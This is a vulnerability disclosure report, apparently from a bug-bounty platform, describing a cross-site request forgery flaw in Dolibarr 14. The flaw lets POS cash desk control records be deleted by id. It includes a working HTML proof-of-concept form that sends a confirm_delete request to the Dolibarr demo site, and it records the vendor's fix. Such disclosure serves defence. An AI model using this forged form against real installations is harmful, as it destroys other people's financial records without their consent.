Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In Bank section the POS part, you don't protect resources from delete with CSRF attacks and then I able to delete/close arbitrary POS cash desk control entities only with knowing their ids.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/compta/cashcontrol/cashcontrol_card.php">
      <input type="hidden" name="id" value="4" />
      <input type="hidden" name="action" value="confirm&#95;delete" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of delete mentioned POC entities from Bank section. version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur confirmed that a fix has been merged on 6390f2 a year ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation